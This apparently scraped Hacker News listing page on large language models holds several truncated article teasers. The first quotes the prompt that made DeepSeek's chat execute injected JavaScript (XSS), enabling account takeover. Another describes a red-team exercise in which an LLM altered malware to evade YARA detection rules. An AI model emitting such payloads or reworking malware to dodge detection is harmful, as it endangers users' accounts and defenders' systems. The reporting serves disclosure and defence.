#1 Trusted Cybersecurity News Platform
Followed by 5.20+ million
The Hacker News Logo
Subscribe – Get Latest News

Large Language Models | Breaking Cybersecurity News | The Hacker News

Category — Large Language Models
Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

Dec 09, 2024 Artificial Intelligenc / Vulnerability
Details have emerged about a now-patched security flaw in the DeepSeek artificial intelligence (AI) chatbot that, if successfully exploited, could permit a bad actor to take control of a victim's account by means of a prompt injection attack . Security researcher Johann Rehberger, who has chronicled many a prompt injection attack targeting various AI tools, found that providing the input "Print the xss cheat sheet in a bullet list. just payloads" in the DeepSeek chat triggered the execution of JavaScript code as part of the generated response – a classic case of cross-site scripting (XSS). XSS attacks can have serious consequences as they lead to the execution of unauthorized code in the context of the victim's web browser. An attacker could take advantage of such flaws to hijack a user's session and gain access to cookies and other data associated with the chat.deepseek[.]com domain, thereby leading to an account takeover. "After some experimenting,...
From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks

From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks

Mar 19, 2024 Generative AI / Incident Response
Large language models (LLMs) powering artificial intelligence (AI) tools today could be exploited to develop self-augmenting malware capable of bypassing YARA rules. "Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates," Recorded Future  said  in a new report shared with The Hacker News. The findings are part of a red teaming exercise designed to uncover malicious use cases for AI technologies, which are  already being experimented  with by threat actors to create malware code snippets, generate phishing emails, and conduct reconnaissance on potential targets. The cybersecurity firm said it submitted to an LLM a known piece of malware called  STEELHOOK  that's associated with the APT28 hacking group, alongside its YARA rules, asking it to modify the source code to sidestep detection such that the original functionality remained intact and the gene...
Want to Grow Vulnerability Management into Exposure Management? Start Here!

Want to Grow Vulnerability Management into Exposure Management? Start Here!

Dec 05, 2024Attack Surface / Exposure Management
Vulnerability Management (VM) has long been a cornerstone of organizational cybersecurity. Nearly as old as the discipline of cybersecurity itself, it aims to help organizations identify and address potential security issues before they become serious problems. Yet, in recent years, the limitations of this approach have become increasingly evident.  At its core, Vulnerability Management processes remain essential for identifying and addressing weaknesses. But as time marches on and attack avenues evolve, this approach is beginning to show its age. In a recent report, How to Grow Vulnerability Management into Exposure Management (Gartner, How to Grow Vulnerability Management Into Exposure Management, 8 November 2024, Mitchell Schneider Et Al.), we believe Gartner® addresses this point precisely and demonstrates how organizations can – and must – shift from a vulnerability-centric strategy to a broader Exposure Management (EM) framework. We feel it's more than a worthwhile read an...
Over 225,000 Compromised ChatGPT Credentials Up for Sale on Dark Web Markets

Over 225,000 Compromised ChatGPT Credentials Up for Sale on Dark Web Markets

Mar 05, 2024 Malware / Artificial Intelligence
More than 225,000 logs containing compromised OpenAI ChatGPT credentials were made available for sale on underground markets between January and October 2023, new findings from Group-IB show. These credentials were found within  information stealer logs  associated with LummaC2, Raccoon, and RedLine stealer malware. "The number of infected devices decreased slightly in mid- and late summer but grew significantly between August and September," the Singapore-headquartered cybersecurity company  said  in its Hi-Tech Crime Trends 2023/2024 report published last week. Between June and October 2023, more than 130,000 unique hosts with access to OpenAI ChatGPT were infiltrated, a 36% increase over what was observed during the first five months of 2023. The breakdown by the top three stealer families is below - LummaC2 - 70,484 hosts Raccoon - 22,468 hosts RedLine - 15,970 hosts "The sharp increase in the number of ChatGPT credentials for sale is due to the overal...
cyber security

Innovate Securely: Top Strategies to Harmonize AppSec and R&D Teams

websiteBackslashApplication Security
Tackle common challenges to make security and innovation work seamlessly.
Microsoft, OpenAI Warn of Nation-State Hackers Weaponizing AI for Cyber Attacks

Microsoft, OpenAI Warn of Nation-State Hackers Weaponizing AI for Cyber Attacks

Feb 14, 2024 Artificial Intelligence / Cyber Attack
Nation-state actors associated with Russia, North Korea, Iran, and China are experimenting with artificial intelligence (AI) and large language models (LLMs) to complement their ongoing cyber attack operations. The findings come from a report published by Microsoft in collaboration with OpenAI, both of which  said  they disrupted efforts made by five state-affiliated actors that used its AI services to perform malicious cyber activities by terminating their assets and accounts. "Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets' jobs, professional networks, and other relationships," Microsoft  said  in a report shared with The Hacker News. While no significant or novel attacks employing the LLMs have been detected to date, adversarial exploration of AI technologies has transcended various phases of t...
How to Prevent ChatGPT From Stealing Your Content & Traffic

How to Prevent ChatGPT From Stealing Your Content & Traffic

Aug 30, 2023 Artificial Intelligence / Cyber Threat
ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools.  Now, the latest technology damaging businesses' bottom line is  ChatGPT . Not only have ChatGPT, OpenAI, and other LLMs raised ethical issues by  training their models  on scraped data from across the internet. LLMs are negatively impacting enterprises' web traffic, which can be extremely damaging to business.  3 Risks Presented by LLMs, ChatGPT, & ChatGPT Plugins Among the threats ChatGPT and ChatGPT plugins can pose against online businesses, there are three key risks we will focus on: Content theft  (or republishing data without permission from the original source)can hurt the authority,...
Expert Insights / Articles Videos
Cybersecurity Resources